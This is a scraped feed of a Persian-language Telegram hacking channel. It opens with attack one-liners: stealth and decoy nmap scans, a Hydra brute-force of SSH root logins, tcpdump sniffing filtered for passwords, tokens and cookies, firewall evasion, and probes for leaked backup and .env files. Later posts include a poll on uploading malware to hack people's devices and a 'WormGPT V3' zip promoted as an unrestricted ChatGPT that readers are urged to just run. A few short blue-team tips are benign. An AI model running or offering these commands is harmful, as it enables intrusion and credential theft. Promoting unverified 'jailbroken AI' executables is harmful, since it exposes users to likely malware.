مخفی کردن خودت موقع اسکن (Stealth Mode)
پیدا کردن آسیبپذیریهای خاص با یک خط
گرفتن اطلاعات WHOIS و DNS با یک خط
پیدا کردن سابدامینهای مخفی
کرک SSH سریع با هیدرا
شنود ترافیک شبکه با tcpdump
دور زدن فایروال با فرگمنتکردن
پیدا کردن فایلهای حساس روی سرور
تمام🗿
#nmap #Hydra #SSH #Hacking #آموزشی #ℳℴ𝒷𝒾𝓃
nmap -sS -p- -T2 -D RND:10 --randomize-hosts --spoof-mac 0 -f target.com
پیدا کردن آسیبپذیریهای خاص با یک خط
nmap --script="http-*" -p 80,443 target.com | grep -E "CVE|exploit|vulnerable|http-enum|http-title|http-headers"
گرفتن اطلاعات WHOIS و DNS با یک خط
whois target.com && dig ANY target.com +short && host -a target.com
پیدا کردن سابدامینهای مخفی
for sub in $(cat wordlist.txt); do host $sub.target.com | grep "has address" & done; wait
کرک SSH سریع با هیدرا
hydra -l root -P rockyou.txt -t 4 -w 5 ssh://target.com
شنود ترافیک شبکه با tcpdump
sudo tcpdump -i eth0 -nn -s0 -A 'port 80 or port 443' | grep -iE "password|user|token|cookie"
دور زدن فایروال با فرگمنتکردن
nmap -f --mtu 8 -sS -p 80,443 target.com
پیدا کردن فایلهای حساس روی سرور
for ext in .bak .sql .zip .tar.gz .env .config; do echo "--- $ext ---"; curl -s -o /dev/null -w "%{http_code}" http://target.com/backup$ext; echo; doneتمام🗿
#nmap #Hydra #SSH #Hacking #آموزشی #ℳℴ𝒷𝒾𝓃
⚡18❤2🔥1
جمعآوری اطلاعات از طریق ایمیل
#آموزشی #Email #OSINT
🩸 OSINT از ایمیلها:
۱. بررسی HaveIBeenPwned (هشدار لو رفتن رمز)
۲. جستجوی Hunter.io برای ایمیلهای سازمانی
۳. بررسی LinkedIn برای ساختار ایمیل (first.last@company.com)
۴. Sherlock: پیدا کردن حسابهای کاربری با یک نام کاربری
🎯 ابزار: theHarvester
theHarvester -d target.com -b google,linkedin#آموزشی #Email #OSINT
⚡17❤3
Phishing Frenzy | فریمورک شبیهسازی فیشینگ 🎣
🔺 Phishing Frenzy یک ابزار متنباز برای مدیریت و اجرای کمپینهای فیشینگ در محیطهای تست امنیتی است.
🔺 امکان ساخت صفحات شبیهسازیشده، مدیریت کمپینها و بررسی نتایج را فراهم میکند.
📌 مناسب برای آموزش، آگاهیرسانی و ارزیابی امنیت سازمانها
🔗 GitHub link
#Phishing #CyberSecurity
#Tyger
🔺 Phishing Frenzy یک ابزار متنباز برای مدیریت و اجرای کمپینهای فیشینگ در محیطهای تست امنیتی است.
🔺 امکان ساخت صفحات شبیهسازیشده، مدیریت کمپینها و بررسی نتایج را فراهم میکند.
📌 مناسب برای آموزش، آگاهیرسانی و ارزیابی امنیت سازمانها
🔗 GitHub link
#Phishing #CyberSecurity
#Tyger
🔥4⚡2❤1
فردا کدومو اپلود کنم🐶
Anonymous Poll
35%
بد افزار برای ه.ک دیوایس طرف
56%
اسکریپت مخرب
8%
سورس کد کاربردی
⚡19❤5
🛡️ Blue Team Fact
خیلی از حملات با یک Alert واضح شروع نمیشن؛
گاهی مهاجم با استفاده از ابزارهای قانونی سیستم مثل PowerShell فعالیت میکنه تا رفتار مخربش کمتر جلب توجه کنه.
🎯 به همین دلیل، در SOC فقط دنبال «ابزار مخرب» نیستند؛ رفتار و الگوی اجرای آن اهمیت زیادی دارد.
#SOC #BlueTeam #PowerShell #CyberSecurity #Tyger
خیلی از حملات با یک Alert واضح شروع نمیشن؛
گاهی مهاجم با استفاده از ابزارهای قانونی سیستم مثل PowerShell فعالیت میکنه تا رفتار مخربش کمتر جلب توجه کنه.
🎯 به همین دلیل، در SOC فقط دنبال «ابزار مخرب» نیستند؛ رفتار و الگوی اجرای آن اهمیت زیادی دارد.
#SOC #BlueTeam #PowerShell #CyberSecurity #Tyger
⚡19❤2🔥1
🔴 Red Team Fact
در Red Team، هدف فقط «نفوذ» نیست؛ هدف اینه که مشخص بشه آیا تیم دفاعی میتونه فعالیت مهاجم رو تشخیص بده یا نه. 👀
به همین دلیل، هر عملیات Red Team باید قابل اندازهگیری و مستندسازی باشه تا نقاط ضعف دفاعی مشخص بشن.
#RedTeam #CyberSecurity #Pentest
#Tyger
در Red Team، هدف فقط «نفوذ» نیست؛ هدف اینه که مشخص بشه آیا تیم دفاعی میتونه فعالیت مهاجم رو تشخیص بده یا نه. 👀
به همین دلیل، هر عملیات Red Team باید قابل اندازهگیری و مستندسازی باشه تا نقاط ضعف دفاعی مشخص بشن.
#RedTeam #CyberSecurity #Pentest
#Tyger
⚡18❤2🔥2
🛡️ Security Fact
🦠 Trojan یا «اسب تروجان» خودش یک نوع بدافزار محسوب میشه که معمولاً خودش رو به شکل یک فایل یا برنامهی بهظاهر سالم نشون میده.
مثلاً ممکنه یک فایل ظاهراً معمولی اجرا بشه، اما در پسزمینه فعالیت مخربی انجام بده.
🎯 نکته مهم برای Blue Team:
ظاهر سالم یک فایل، به معنی امن بودنش نیست.
#CyberSecurity #Trojan #BlueTeam #Malware #Tyger
🦠 Trojan یا «اسب تروجان» خودش یک نوع بدافزار محسوب میشه که معمولاً خودش رو به شکل یک فایل یا برنامهی بهظاهر سالم نشون میده.
مثلاً ممکنه یک فایل ظاهراً معمولی اجرا بشه، اما در پسزمینه فعالیت مخربی انجام بده.
🎯 نکته مهم برای Blue Team:
ظاهر سالم یک فایل، به معنی امن بودنش نیست.
#CyberSecurity #Trojan #BlueTeam #Malware #Tyger
⚡15❤5🔥1
🦠 Malware Fact
بدافزارها فقط برای خراب کردن سیستم ساخته نمیشن؛
بعضی از آنها با هدف سرقت اطلاعات، دسترسی غیرمجاز یا حفظ دسترسی طولانیمدت طراحی میشن.
🎯 نکته جالب: بعضی بدافزارها تلاش میکنن فعالیت خودشون رو از دید کاربر و ابزارهای امنیتی مخفی نگه دارن.
#Malware #CyberSecurity #Threat
#Tyger
بدافزارها فقط برای خراب کردن سیستم ساخته نمیشن؛
بعضی از آنها با هدف سرقت اطلاعات، دسترسی غیرمجاز یا حفظ دسترسی طولانیمدت طراحی میشن.
🎯 نکته جالب: بعضی بدافزارها تلاش میکنن فعالیت خودشون رو از دید کاربر و ابزارهای امنیتی مخفی نگه دارن.
#Malware #CyberSecurity #Threat
#Tyger
⚡18❤2👍1
🕶️ Hacker Fact
هکرها همیشه دنبال «هک کردن سیستم» نیستند؛
گاهی ارزشمندترین نقطه ورود، انسان پشت سیستم است. 🎯
مهندسی اجتماعی با سوءاستفاده از اعتماد، عجله یا خطای انسانی میتواند مسیر حمله را باز کند.
🔐 ضعیفترین نقطه یک سیستم، همیشه تکنولوژی نیست.
#Hacker #SocialEngineering #CyberSecurity #Tyger
هکرها همیشه دنبال «هک کردن سیستم» نیستند؛
گاهی ارزشمندترین نقطه ورود، انسان پشت سیستم است. 🎯
مهندسی اجتماعی با سوءاستفاده از اعتماد، عجله یا خطای انسانی میتواند مسیر حمله را باز کند.
🔐 ضعیفترین نقطه یک سیستم، همیشه تکنولوژی نیست.
#Hacker #SocialEngineering #CyberSecurity #Tyger
⚡20❤2🔥1
🕶️ Hacker Fact
هکرها قبل از شروع حمله، گاهی مدت زیادی صرف جمعآوری اطلاعات (OSINT) میکنن.
اطلاعاتی که در شبکههای اجتماعی، سایتها، دامنهها و منابع عمومی منتشر میشه، میتونه برای شناخت بهتر هدف مورد استفاده قرار بگیره. 🎯
🔐 هر اطلاعات عمومی، لزوماً بیاهمیت نیست.
#Hacker #OSINT #CyberSecurity #Recon #Tyger
هکرها قبل از شروع حمله، گاهی مدت زیادی صرف جمعآوری اطلاعات (OSINT) میکنن.
اطلاعاتی که در شبکههای اجتماعی، سایتها، دامنهها و منابع عمومی منتشر میشه، میتونه برای شناخت بهتر هدف مورد استفاده قرار بگیره. 🎯
🔐 هر اطلاعات عمومی، لزوماً بیاهمیت نیست.
#Hacker #OSINT #CyberSecurity #Recon #Tyger
⚡18❤3🔥1
WormGPT V3@Nullactive.zip
32.2 KB
اول از همه اینو براتون پابلیک میکنم
ورم جی بی تی یا همون چت جی بی تی نسخه اول که بدون هیچ محدودیتی هر پاسخی رو میداد بهتون
هرجایی نمیتونین سالم یا فایل اینو پیدا کنین
این فایل کاملا امن و تست شدس
میتونین تست کنین توی کامپیوتر و نظرتون بگید
کافیه رانش کنین
ورم جی بی تی یا همون چت جی بی تی نسخه اول که بدون هیچ محدودیتی هر پاسخی رو میداد بهتون
هرجایی نمیتونین سالم یا فایل اینو پیدا کنین
این فایل کاملا امن و تست شدس
میتونین تست کنین توی کامپیوتر و نظرتون بگید
کافیه رانش کنین
⚡20❤4👎1🔥1
DarkPacket
سرعت دانلود دارم ولی اپلود افتضاح هروقت فایلی اپلود میکنم نت اینجوری ادا میده بزارین ی vps اوکی کنم با اون اپلود کنم
به یکی از رفقا سپردم ی سرور اوکی کنه وقتی اوکی شد من همون لحظه اپلود میکنم
ممکنه به فردا موکول شه و من از این بابت عذر میخام از همتون🖥
ممکنه به فردا موکول شه و من از این بابت عذر میخام از همتون
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡18❤4👍1💔1
🧠 Cybersecurity Fact
میدونستی یک Log ساده میتونه بعداً مهمترین مدرک یک حمله باشه؟ 👀
زمان ورود، IP، نوع درخواست و رفتار کاربر میتونه به تحلیلگر کمک کنه بفهمه چه اتفاقی افتاده، از کجا شروع شده و مهاجم چه کاری انجام داده.
🔎 گاهی چیزی که موقع حمله بیاهمیت به نظر میاد، در تحلیل Incident حیاتی میشه.
#CyberSecurity #SOC #BlueTeam #LogAnalysis #Tyger
میدونستی یک Log ساده میتونه بعداً مهمترین مدرک یک حمله باشه؟ 👀
زمان ورود، IP، نوع درخواست و رفتار کاربر میتونه به تحلیلگر کمک کنه بفهمه چه اتفاقی افتاده، از کجا شروع شده و مهاجم چه کاری انجام داده.
🔎 گاهی چیزی که موقع حمله بیاهمیت به نظر میاد، در تحلیل Incident حیاتی میشه.
#CyberSecurity #SOC #BlueTeam #LogAnalysis #Tyger
⚡18❤3🔥1
🕶️ Hacker Fact
مهاجم حرفهای لزوماً بعد از نفوذ، سراغ سرقت اطلاعات نمیره.
گاهی اول Persistence ایجاد میکنه؛ یعنی راهی برای حفظ دسترسی به سیستم، حتی بعد از ریاستارت یا تغییر شرایط.
🎯 برای همین، «حذف بدافزار» همیشه به معنی «حذف مهاجم» نیست.
#Hacker #CyberSecurity #Persistence #RedTeam #Tyger
مهاجم حرفهای لزوماً بعد از نفوذ، سراغ سرقت اطلاعات نمیره.
گاهی اول Persistence ایجاد میکنه؛ یعنی راهی برای حفظ دسترسی به سیستم، حتی بعد از ریاستارت یا تغییر شرایط.
🎯 برای همین، «حذف بدافزار» همیشه به معنی «حذف مهاجم» نیست.
#Hacker #CyberSecurity #Persistence #RedTeam #Tyger
⚡18🔥5❤3
روز های گرم و گرمتری تو این یک ماه برای ایران وجود دارد امیدوارم سالم سلامت باشید
⚡21❤4